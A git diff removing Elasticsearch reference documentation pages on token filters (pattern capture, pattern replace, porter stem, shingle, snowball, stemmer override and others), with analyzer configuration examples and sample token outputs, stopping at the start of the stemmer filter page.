b/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc deleted file mode 100644 index b47420baf9d..00000000000 --- a/docs/reference/analysis/tokenfilters/normalization-tokenfilter.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[analysis-normalization-tokenfilter]] -=== Normalization token filters -++++ -Normalization -++++ - -There are several token filters available which try to normalize special -characters of a certain language. - -[horizontal] -Arabic:: - -{lucene-analysis-docs}/ar/ArabicNormalizer.html[`arabic_normalization`] - -German:: - -{lucene-analysis-docs}/de/GermanNormalizationFilter.html[`german_normalization`] - -Hindi:: - -{lucene-analysis-docs}/hi/HindiNormalizer.html[`hindi_normalization`] - -Indic:: - -{lucene-analysis-docs}/in/IndicNormalizer.html[`indic_normalization`] - -Kurdish (Sorani):: - -{lucene-analysis-docs}/ckb/SoraniNormalizer.html[`sorani_normalization`] - -Persian:: - -{lucene-analysis-docs}/fa/PersianNormalizer.html[`persian_normalization`] - -Scandinavian:: - -{lucene-analysis-docs}/miscellaneous/ScandinavianNormalizationFilter.html[`scandinavian_normalization`], -{lucene-analysis-docs}/miscellaneous/ScandinavianFoldingFilter.html[`scandinavian_folding`] - -Serbian:: - -{lucene-analysis-docs}/sr/SerbianNormalizationFilter.html[`serbian_normalization`] - diff --git a/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc deleted file mode 100644 index b57c31a64e3..00000000000 --- a/docs/reference/analysis/tokenfilters/pattern-capture-tokenfilter.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[analysis-pattern-capture-tokenfilter]] -=== Pattern capture token filter -++++ -Pattern capture -++++ - -The `pattern_capture` token filter, unlike the `pattern` tokenizer, -emits a token for every capture group in the regular expression. -Patterns are not anchored to the beginning and end of the string, so -each pattern can match multiple times, and matches are allowed to -overlap. - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern capture token filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -For instance a pattern like : - -[source,text] --------------------------------------------------- -"(([a-z]+)(\d*))" --------------------------------------------------- - -when matched against: - -[source,text] --------------------------------------------------- -"abc123def456" --------------------------------------------------- - -would produce the tokens: [ `abc123`, `abc`, `123`, `def456`, `def`, -`456` ] - -If `preserve_original` is set to `true` (the default) then it would also -emit the original token: `abc123def456`. - -This is particularly useful for indexing text like camel-case code, eg -`stripHTML` where a user may search for `"strip html"` or `"striphtml"`: - -[source,console] --------------------------------------------------- -PUT test -{ - "settings" : { - "analysis" : { - "filter" : { - "code" : { - "type" : "pattern_capture", - "preserve_original" : true, - "patterns" : [ - "(\\p{Ll}+|\\p{Lu}\\p{Ll}+|\\p{Lu}+)", - "(\\d+)" - ] - } - }, - "analyzer" : { - "code" : { - "tokenizer" : "pattern", - "filter" : [ "code", "lowercase" ] - } - } - } - } -} --------------------------------------------------- - -When used to analyze the text - -[source,java] --------------------------------------------------- -import static org.apache.commons.lang.StringEscapeUtils.escapeHtml --------------------------------------------------- - -this emits the tokens: [ `import`, `static`, `org`, `apache`, `commons`, -`lang`, `stringescapeutils`, `string`, `escape`, `utils`, `escapehtml`, -`escape`, `html` ] - -Another example is analyzing email addresses: - -[source,console] --------------------------------------------------- -PUT test -{ - "settings" : { - "analysis" : { - "filter" : { - "email" : { - "type" : "pattern_capture", - "preserve_original" : true, - "patterns" : [ - "([^@]+)", - "(\\p{L}+)", - "(\\d+)", - "@(.+)" - ] - } - }, - "analyzer" : { - "email" : { - "tokenizer" : "uax_url_email", - "filter" : [ "email", "lowercase", "unique" ] - } - } - } - } -} --------------------------------------------------- - -When the above analyzer is used on an email address like: - -[source,text] --------------------------------------------------- -john-smith_123@foo-bar.com --------------------------------------------------- - -it would produce the following tokens: - - john-smith_123@foo-bar.com, john-smith_123, - john, smith, 123, foo-bar.com, foo, bar, com - -Multiple patterns are required to allow overlapping captures, but also -means that patterns are less dense and easier to understand. - -*Note:* All tokens are emitted in the same position, and with the same -character offsets. This means, for example, that a `match` query for -`john-smith_123@foo-bar.com` that uses this analyzer will return documents -containing any of these tokens, even when using the `and` operator. -Also, when combined with highlighting, the whole original token will -be highlighted, not just the matching subset. For instance, querying -the above email address for `"smith"` would highlight: - -[source,html] --------------------------------------------------- - john-smith_123@foo-bar.com --------------------------------------------------- - -not: - -[source,html] --------------------------------------------------- - john-smith_123@foo-bar.com --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc deleted file mode 100644 index 37b96f23c8a..00000000000 --- a/docs/reference/analysis/tokenfilters/pattern_replace-tokenfilter.asciidoc +++ /dev/null @@ -1,157 +0,0 @@ -[[analysis-pattern_replace-tokenfilter]] -=== Pattern replace token filter -++++ -Pattern replace -++++ - -Uses a regular expression to match and replace token substrings. - -The `pattern_replace` filter uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java's -regular expression syntax]. By default, the filter replaces matching substrings -with an empty substring (`""`). Replacement substrings can use Java's -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#appendReplacement-java.lang.StringBuffer-java.lang.String-[`$g` -syntax] to reference capture groups from the original token text. - -[WARNING] -==== -A poorly-written regular expression may run slowly or return a -StackOverflowError, causing the node running the expression to exit suddenly. - -Read more about -https://www.regular-expressions.info/catastrophic.html[pathological regular -expressions and how to avoid them]. -==== - -This filter uses Lucene's -{lucene-analysis-docs}/pattern/PatternReplaceFilter.html[PatternReplaceFilter]. - -[[analysis-pattern-replace-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `pattern_replace` -filter to prepend `watch` to the substring `dog` in `foxes jump lazy dogs`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "pattern_replace", - "pattern": "(dog)", - "replacement": "watch$1" - } - ], - "text": "foxes jump lazy dogs" -} ----- - -The filter produces the following tokens. - -[source,text] ----- -[ foxes, jump, lazy, watchdogs ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "foxes", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 6, - "end_offset": 10, - "type": "word", - "position": 1 - }, - { - "token": "lazy", - "start_offset": 11, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "watchdogs", - "start_offset": 16, - "end_offset": 20, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -[[analysis-pattern-replace-tokenfilter-configure-parms]] -==== Configurable parameters - -`all`:: -(Optional, Boolean) -If `true`, all substrings matching the `pattern` parameter's regular expression -are replaced. If `false`, the filter replaces only the first matching substring -in each token. Defaults to `true`. - -`pattern`:: -(Required, string) -Regular expression, written in -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java's -regular expression syntax]. The filter replaces token substrings matching this -pattern with the substring in the `replacement` parameter. - -`replacement`:: -(Optional, string) -Replacement substring. Defaults to an empty substring (`""`). - -[[analysis-pattern-replace-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `pattern_replace` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`pattern_replace` filter, `my_pattern_replace_filter`. - -The `my_pattern_replace_filter` filter uses the regular expression `[£|€]` to -match and remove the currency symbols `£` and `€`. The filter's `all` -parameter is `false`, meaning only the first matching symbol in each token is -removed. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ - "my_pattern_replace_filter" - ] - } - }, - "filter": { - "my_pattern_replace_filter": { - "type": "pattern_replace", - "pattern": "[£|€]", - "replacement": "", - "all": false - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc deleted file mode 100644 index cceac39e691..00000000000 --- a/docs/reference/analysis/tokenfilters/phonetic-tokenfilter.asciidoc +++ /dev/null @@ -1,7 +0,0 @@ -[[analysis-phonetic-tokenfilter]] -=== Phonetic token filter -++++ -Phonetic -++++ - -The `phonetic` token filter is provided as the {plugins}/analysis-phonetic.html[`analysis-phonetic`] plugin. diff --git a/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc deleted file mode 100644 index 6c228ceb045..00000000000 --- a/docs/reference/analysis/tokenfilters/porterstem-tokenfilter.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[analysis-porterstem-tokenfilter]] -=== Porter stem token filter -++++ -Porter stem -++++ - -Provides <> for the English language, -based on the https://snowballstem.org/algorithms/porter/stemmer.html[Porter -stemming algorithm]. - -This filter tends to stem more aggressively than other English -stemmer filters, such as the <> filter. - -The `porter_stem` filter is equivalent to the -<> filter's -<> variant. - -The `porter_stem` filter uses Lucene's -{lucene-analysis-docs}/en/PorterStemFilter.html[PorterStemFilter]. - -[[analysis-porterstem-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `porter_stem` filter to stem -`the foxes jumping quickly` to `the fox jump quickli`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "porter_stem" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quickli ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quickli", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-porterstem-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`porter_stem` filter to configure a new <>. - -[IMPORTANT] -==== -To work properly, the `porter_stem` filter requires lowercase tokens. To ensure -tokens are lowercased, add the <> -filter before the `porter_stem` filter in the analyzer configuration. -==== - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "porter_stem" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc deleted file mode 100644 index b90350e2bbd..00000000000 --- a/docs/reference/analysis/tokenfilters/predicate-tokenfilter.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[analysis-predicatefilter-tokenfilter]] -=== Predicate script token filter -++++ -Predicate script -++++ - -Removes tokens that don't match a provided predicate script. The filter supports -inline {painless}/index.html[Painless] scripts only. Scripts are evaluated in -the {painless}/painless-analysis-predicate-context.html[analysis predicate -context]. - -[[analysis-predicatefilter-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`predicate_token_filter` filter to only output tokens longer than three -characters from `the fox jumps the lazy dog`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "predicate_token_filter", - "script": { - "source": """ - token.term.length() > 3 - """ - } - } - ], - "text": "the fox jumps the lazy dog" -} ----- - -The filter produces the following tokens. - -[source,text] ----- -[ jumps, lazy ] ----- - -The API response contains the position and offsets of each output token. Note -the `predicate_token_filter` filter does not change the tokens' original -positions or offets. - -.*Response* -[%collapsible] -==== -[source,console-result] ----- -{ - "tokens" : [ - { - "token" : "jumps", - "start_offset" : 8, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "lazy", - "start_offset" : 18, - "end_offset" : 22, - "type" : "word", - "position" : 4 - } - ] -} ----- -==== - -[[analysis-predicatefilter-tokenfilter-configure-parms]] -==== Configurable parameters - -`script`:: -(Required, <>) -Script containing a condition used to filter incoming tokens. Only tokens that -match this script are included in the output. -+ -This parameter supports inline {painless}/index.html[Painless] scripts only. The -script is evaluated in the -{painless}/painless-analysis-predicate-context.html[analysis predicate context]. - -[[analysis-predicatefilter-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `predicate_token_filter` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -The following <> request -configures a new <> using a custom -`predicate_token_filter` filter, `my_script_filter`. - -The `my_script_filter` filter removes tokens with of any type other than -`ALPHANUM`. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "my_script_filter" - ] - } - }, - "filter": { - "my_script_filter": { - "type": "predicate_token_filter", - "script": { - "source": """ - token.type.contains("ALPHANUM") - """ - } - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc deleted file mode 100644 index 52f2146f1da..00000000000 --- a/docs/reference/analysis/tokenfilters/remove-duplicates-tokenfilter.asciidoc +++ /dev/null @@ -1,154 +0,0 @@ -[[analysis-remove-duplicates-tokenfilter]] -=== Remove duplicates token filter -++++ -Remove duplicates -++++ - -Removes duplicate tokens in the same position. - -The `remove_duplicates` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/RemoveDuplicatesTokenFilter.html[RemoveDuplicatesTokenFilter]. - -[[analysis-remove-duplicates-tokenfilter-analyze-ex]] -==== Example - -To see how the `remove_duplicates` filter works, you first need to produce a -token stream containing duplicate tokens in the same position. - -The following <> request uses the -<> and -<> filters to create stemmed and -unstemmed tokens for `jumping dog`. - -[source,console] ----- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer" - ], - "text": "jumping dog" -} ----- - -The API returns the following response. Note that the `dog` token in position -`1` is duplicated. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "jumping", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - } - ] -} ----- - -To remove one of the duplicate `dog` tokens, add the `remove_duplicates` filter -to the previous analyze API request. - -[source,console] ----- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ], - "text": "jumping dog" -} ----- - -The API returns the following response. There is now only one `dog` token in -position `1`. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "jumping", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "jump", - "start_offset": 0, - "end_offset": 7, - "type": "word", - "position": 0 - }, - { - "token": "dog", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 1 - } - ] -} ----- - -[[analysis-remove-duplicates-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`remove_duplicates` filter to configure a new <>. - -This custom analyzer uses the `keyword_repeat` and `stemmer` filters to create a -stemmed and unstemmed version of each token in a stream. The `remove_duplicates` -filter then removes any duplicate tokens in the same position. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "standard", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc deleted file mode 100644 index d66e143b4c4..00000000000 --- a/docs/reference/analysis/tokenfilters/reverse-tokenfilter.asciidoc +++ /dev/null @@ -1,93 +0,0 @@ -[[analysis-reverse-tokenfilter]] -=== Reverse token filter -++++ -Reverse -++++ - -Reverses each token in a stream. For example, you can use the `reverse` filter -to change `cat` to `tac`. - -Reversed tokens are useful for suffix-based searches, -such as finding words that end in `-ion` or searching file names by their -extension. - -This filter uses Lucene's -{lucene-analysis-docs}/reverse/ReverseStringFilter.html[ReverseStringFilter]. - -[[analysis-reverse-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `reverse` -filter to reverse each token in `quick fox jumps`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["reverse"], - "text" : "quick fox jumps" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ kciuq, xof, spmuj ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "kciuq", - "start_offset" : 0, - "end_offset" : 5, - "type" : "", - "position" : 0 - }, - { - "token" : "xof", - "start_offset" : 6, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "spmuj", - "start_offset" : 10, - "end_offset" : 15, - "type" : "", - "position" : 2 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-reverse-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`reverse` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT reverse_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "whitespace_reverse" : { - "tokenizer" : "whitespace", - "filter" : ["reverse"] - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc deleted file mode 100644 index 0598fb32971..00000000000 --- a/docs/reference/analysis/tokenfilters/shingle-tokenfilter.asciidoc +++ /dev/null @@ -1,510 +0,0 @@ -[[analysis-shingle-tokenfilter]] -=== Shingle token filter -++++ -Shingle -++++ - -Add shingles, or word {wikipedia}/N-gram[n-grams], to a token -stream by concatenating adjacent tokens. By default, the `shingle` token filter -outputs two-word shingles and unigrams. - -For example, many tokenizers convert `the lazy dog` to `[ the, lazy, dog ]`. You -can use the `shingle` filter to add two-word shingles to this stream: -`[ the, the lazy, lazy, lazy dog, dog ]`. - -TIP: Shingles are often used to help speed up phrase queries, such as -<>. Rather than creating shingles -using the `shingles` filter, we recommend you use the -<> mapping parameter on the appropriate -<> field instead. - -This filter uses Lucene's -{lucene-analysis-docs}/shingle/ShingleFilter.html[ShingleFilter]. - -[[analysis-shingle-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `shingle` -filter to add two-word shingles to the token stream for `quick brown fox jumps`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ "shingle" ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, quick brown, brown, brown fox, fox, fox jumps, jumps ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "fox", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2, - "positionLength": 2 - }, - { - "token": "jumps", - "start_offset": 16, - "end_offset": 21, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To produce shingles of 2-3 words, add the following arguments to the analyze API -request: - -* `min_shingle_size`: `2` -* `max_shingle_size`: `3` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3 - } - ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, quick brown, quick brown fox, brown, brown fox, brown fox jumps, fox, fox jumps, jumps ] ----- - -//// -[source, console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "quick brown fox", - "start_offset": 0, - "end_offset": 15, - "type": "shingle", - "position": 0, - "positionLength": 3 - }, - { - "token": "brown", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "brown fox jumps", - "start_offset": 6, - "end_offset": 21, - "type": "shingle", - "position": 1, - "positionLength": 3 - }, - { - "token": "fox", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2, - "positionLength": 2 - }, - { - "token": "jumps", - "start_offset": 16, - "end_offset": 21, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To only include shingles in the output, add an `output_unigrams` argument of -`false` to the request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3, - "output_unigrams": false - } - ], - "text": "quick brown fox jumps" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick brown, quick brown fox, brown fox, brown fox jumps, fox jumps ] ----- - -//// -[source, console-result] ----- -{ - "tokens": [ - { - "token": "quick brown", - "start_offset": 0, - "end_offset": 11, - "type": "shingle", - "position": 0 - }, - { - "token": "quick brown fox", - "start_offset": 0, - "end_offset": 15, - "type": "shingle", - "position": 0, - "positionLength": 2 - }, - { - "token": "brown fox", - "start_offset": 6, - "end_offset": 15, - "type": "shingle", - "position": 1 - }, - { - "token": "brown fox jumps", - "start_offset": 6, - "end_offset": 21, - "type": "shingle", - "position": 1, - "positionLength": 2 - }, - { - "token": "fox jumps", - "start_offset": 12, - "end_offset": 21, - "type": "shingle", - "position": 2 - } - ] -} ----- -//// - -[[analysis-shingle-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`shingle` filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "standard_shingle": { - "tokenizer": "standard", - "filter": [ "shingle" ] - } - } - } - } -} ----- - -[[analysis-shingle-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_shingle_size`:: -(Optional, integer) -Maximum number of tokens to concatenate when creating shingles. Defaults to `2`. -+ -NOTE: This value cannot be lower than the `min_shingle_size` argument, which -defaults to `2`. The difference between this value and the `min_shingle_size` -argument cannot exceed the <> -index-level setting, which defaults to `3`. - -`min_shingle_size`:: -(Optional, integer) -Minimum number of tokens to concatenate when creating shingles. Defaults to `2`. -+ -NOTE: This value cannot exceed the `max_shingle_size` argument, which defaults -to `2`. The difference between the `max_shingle_size` argument and this value -cannot exceed the <> -index-level setting, which defaults to `3`. - -`output_unigrams`:: -(Optional, Boolean) -If `true`, the output includes the original input tokens. If `false`, the output -only includes shingles; the original input tokens are removed. Defaults to -`true`. - -`output_unigrams_if_no_shingles`:: -If `true`, the output includes the original input tokens only if no shingles are -produced; if shingles are produced, the output only includes shingles. Defaults -to `false`. -+ -IMPORTANT: If both this and the `output_unigrams` parameter are `true`, only the -`output_unigrams` argument is used. - -`token_separator`:: -(Optional, string) -Separator used to concatenate adjacent tokens to form a shingle. Defaults to a -space (`" "`). - -`filler_token`:: -+ --- -(Optional, string) -String used in shingles as a replacement for empty positions that do not contain -a token. This filler token is only used in shingles, not original unigrams. -Defaults to an underscore (`_`). - -Some token filters, such as the `stop` filter, create empty positions when -removing stop words with a position increment greater than one. - -.*Example* -[%collapsible] -==== -In the following <> request, the `stop` filter -removes the stop word `a` from `fox jumps a lazy dog`, creating an empty -position. The subsequent `shingle` filter replaces this empty position with a -plus sign (`+`) in shingles. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "stop", - "stopwords": [ "a" ] - }, - { - "type": "shingle", - "filler_token": "+" - } - ], - "text": "fox jumps a lazy dog" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ fox, fox jumps, jumps, jumps +, + lazy, lazy, lazy dog, dog ] ----- - -//// -[source, console-result] ----- -{ - "tokens" : [ - { - "token" : "fox", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "fox jumps", - "start_offset" : 0, - "end_offset" : 9, - "type" : "shingle", - "position" : 0, - "positionLength" : 2 - }, - { - "token" : "jumps", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "jumps +", - "start_offset" : 4, - "end_offset" : 12, - "type" : "shingle", - "position" : 1, - "positionLength" : 2 - }, - { - "token" : "+ lazy", - "start_offset" : 12, - "end_offset" : 16, - "type" : "shingle", - "position" : 2, - "positionLength" : 2 - }, - { - "token" : "lazy", - "start_offset" : 12, - "end_offset" : 16, - "type" : "word", - "position" : 3 - }, - { - "token" : "lazy dog", - "start_offset" : 12, - "end_offset" : 20, - "type" : "shingle", - "position" : 3, - "positionLength" : 2 - }, - { - "token" : "dog", - "start_offset" : 17, - "end_offset" : 20, - "type" : "word", - "position" : 4 - } - ] -} ----- -//// -==== --- - -[[analysis-shingle-tokenfilter-customize]] -==== Customize - -To customize the `shingle` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `shingle` filter, `my_shingle_filter`, to configure a new -<>. - -The `my_shingle_filter` filter uses a `min_shingle_size` of `2` and a -`max_shingle_size` of `5`, meaning it produces shingles of 2-5 words. -The filter also includes a `output_unigrams` argument of `false`, meaning that -only shingles are included in the output. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "en": { - "tokenizer": "standard", - "filter": [ "my_shingle_filter" ] - } - }, - "filter": { - "my_shingle_filter": { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 5, - "output_unigrams": false - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc deleted file mode 100644 index a76bc6f6c52..00000000000 --- a/docs/reference/analysis/tokenfilters/snowball-tokenfilter.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[analysis-snowball-tokenfilter]] -=== Snowball token filter -++++ -Snowball -++++ - -A filter that stems words using a Snowball-generated stemmer. The -`language` parameter controls the stemmer with the following available -values: `Arabic`, `Armenian`, `Basque`, `Catalan`, `Danish`, `Dutch`, `English`, -`Estonian`, `Finnish`, `French`, `German`, `German2`, `Hungarian`, `Italian`, `Irish`, `Kp`, -`Lithuanian`, `Lovins`, `Norwegian`, `Porter`, `Portuguese`, `Romanian`, -`Russian`, `Spanish`, `Swedish`, `Turkish`. - -For example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "my_snow" ] - } - }, - "filter": { - "my_snow": { - "type": "snowball", - "language": "Lovins" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc deleted file mode 100644 index 99cbe695f8f..00000000000 --- a/docs/reference/analysis/tokenfilters/stemmer-override-tokenfilter.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[analysis-stemmer-override-tokenfilter]] -=== Stemmer override token filter -++++ -Stemmer override -++++ - -Overrides stemming algorithms, by applying a custom mapping, then -protecting these terms from being modified by stemmers. Must be placed -before any stemming filters. - -Rules are mappings in the form of `token1[, ..., tokenN] => override`. - -[cols="<,<",options="header",] -|======================================================================= -|Setting |Description -|`rules` |A list of mapping rules to use. - -|`rules_path` |A path (either relative to `config` location, or -absolute) to a list of mappings. -|======================================================================= - -Here is an example: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "custom_stems", "porter_stem" ] - } - }, - "filter": { - "custom_stems": { - "type": "stemmer_override", - "rules_path": "analysis/stemmer_override.txt" - } - } - } - } -} --------------------------------------------------- - -Where the file looks like: - -[source,stemmer_override] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/stemmer_override.txt[] --------------------------------------------------- - -You can also define the overrides rules inline: - -[source,console] --------------------------------------------------- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "lowercase", "custom_stems", "porter_stem" ] - } - }, - "filter": { - "custom_stems": { - "type": "stemmer_override", - "rules": [ - "running, runs => run", - "stemmer => stemmer" - ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc deleted file mode 100644 index b88c5de0b81..00000000000 --- a/docs/reference/analysis/tokenfilters/stemmer-tokenfilter.asciidoc +++ /dev/null @@ -1,281 